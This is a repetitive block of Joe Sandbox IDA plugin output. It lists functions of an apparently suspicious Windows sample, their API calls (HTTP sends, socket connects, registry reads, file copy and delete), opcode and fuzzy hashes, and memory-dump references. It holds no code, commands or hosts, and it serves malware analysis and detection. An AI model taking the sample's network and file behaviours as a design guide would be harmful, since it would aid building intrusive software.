                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
                                                                                                                                                                                                                                                                                            • Instruction ID: 567a26385f976fdb7e9c64f1dd9d30ac251e2d642bf6d4e3b564833a4be22e49
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0F0B66002006FD324EF2DDC81E5B7BA8EBCA714F00413CB25AD3390DA34A904C769
                                                                                                                                                                                                                                                                                            Function 0040785A Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HttpRequestSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 360639707-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
                                                                                                                                                                                                                                                                                            • Instruction ID: bf0f034a3dd850cf0cb564b24178683266c6b6b51357b7988c54eadef3e04e74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F0AF766002859BD314DF38EC91FAA73E9EB8E304F058668B615D72D2EA30AD50CB14
                                                                                                                                                                                                                                                                                            Function 00401124 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 0040116F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
                                                                                                                                                                                                                                                                                            • Instruction ID: f3b03884cb52d199f356ad5dd5f3a1ff2906ecf3ed5d74594d059c0442db3dd9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F05EB5304204AFD304EB29EC96E2F76AEEBC629CB09412CF645D7251CAB09D109725
                                                                                                                                                                                                                                                                                            Function 00409D4A Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 00409D9B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: connect
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1959786783-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
                                                                                                                                                                                                                                                                                            • Instruction ID: 1c76ee57f995fb73f56d176aba3e3fe730563ee54a1c86628c8c5cf679eeabc3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0014678240300DFD328CF59DD84E1AB3E6AF88304B18882DA5AAC7392C678E804CB19
                                                                                                                                                                                                                                                                                            Function 0040658C Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 004065D3
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HttpRequestSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 360639707-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
                                                                                                                                                                                                                                                                                            • Instruction ID: db716060e8ae9f8fcc5e862a0cebcb454ceb0093ee65c84773531da29eefcbe9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0F9B6B01115DFCF08CBA8DC9097EBBB6BF89254718002DA406D33A1CA305C11DB48
                                                                                                                                                                                                                                                                                            Function 0041E5BA Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0041E5F9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f66ba3a97befe56bb46f98ddc1edee4028ac782d80761f6c23770a61df238c97
                                                                                                                                                                                                                                                                                            • Instruction ID: 0fa74fcbbd74ccd1cf866cb18b277c58b46efe67117f2375fa274a71e14e3a6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f66ba3a97befe56bb46f98ddc1edee4028ac782d80761f6c23770a61df238c97
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F08C7D6803029BC314EF6ADCC0A46B7EAFF99318755082DA593C3752DA38A841CB69
                                                                                                                                                                                                                                                                                            Function 0040BC40 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
                                                                                                                                                                                                                                                                                            • Instruction ID: 6670c946d57bb98f83207a2e2a4dd8fc4f459805bc578e4bde3d9dfa9d5bd7d2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0F631A043058BC304EF2CDD8095577F1FFC5614F44852CE88483262EA30EA56C7C6
                                                                                                                                                                                                                                                                                            Function 0041E504 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0041E518
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
                                                                                                                                                                                                                                                                                            • Instruction ID: cbd043872ff42a4671465c5ece64a3fa1dab85f27f9690b3f564dbc24f64846f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF03076680302DFC3109FEADC9090677EAEFD5B147654429E155C7261DA78F8528718
                                                                                                                                                                                                                                                                                            Function 00428B6F Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00428B8D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
                                                                                                                                                                                                                                                                                            • Instruction ID: 9528cd4afdda23467e0083a937059f108ced78d3526648939f428abbaa092546
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0E277E00149AFEF01CB88EC90ADC77B5EB91204F054071E919E3260D739AE4A8F84
                                                                                                                                                                                                                                                                                            Function 00409CA9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409CF5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: getaddrinfo
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 300660673-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
                                                                                                                                                                                                                                                                                            • Instruction ID: 05f6202e1bc20cb4b29bb86db7e74d39b969980e396a867aade4093ea41b7757
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF06DB1A44344DFE710CF64CCC4B9AB7E4FF85308F05C529A858D7202E7B4A9948B51
                                                                                                                                                                                                                                                                                            Function 00422843 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5945a3499541b6383abbb0a70d97a528e2c9057cc4c6911cb941dca9f761e5af
                                                                                                                                                                                                                                                                                            • Instruction ID: e4ea1631332a28b91d4e6c48b2df1f928bb27cf93cb495e3936d86b248a4f1bc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5945a3499541b6383abbb0a70d97a528e2c9057cc4c6911cb941dca9f761e5af
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F0E23A9143008BC704EF7CCC84666B7E4AF8A268F04063CECE0872E2E6309D59C7D6
                                                                                                                                                                                                                                                                                            Function 00413142 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
                                                                                                                                                                                                                                                                                            • Instruction ID: 23ef3dd95bf6a0164c47cf999acec1c42eb63bf94e27a0aeafc3b0acf90d2c1f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0A0BAB405648BCB09D758DCA1ABC37E3ABC9305B080059C905A7751CA786D61DA4D
                                                                                                                                                                                                                                                                                            Function 0040B98E Relevance: 1.5, APIs: 1, Instructions: 26processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
                                                                                                                                                                                                                                                                                            • Instruction ID: 8b4a8257022abbb41a3118302225be22bdba0b02c73ba330e27b8c205def3af7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F0F9B5A087018BD70CDF29C9906A9B7F0BF9D304F00C96DA899D3361EA30DA45CF05
                                                                                                                                                                                                                                                                                            Function 00412EF8 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00412F23
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
                                                                                                                                                                                                                                                                                            • Instruction ID: b7c71d53dac44b228edffe1a05e153bdbe68826ecec0f01bcc8b446e4b1f0614
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AF030BAB001058FD748CB6CDC91B9D73E7EFD8309B184128A405D7365EA71ED56CB44
                                                                                                                                                                                                                                                                                            Function 0040C871 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
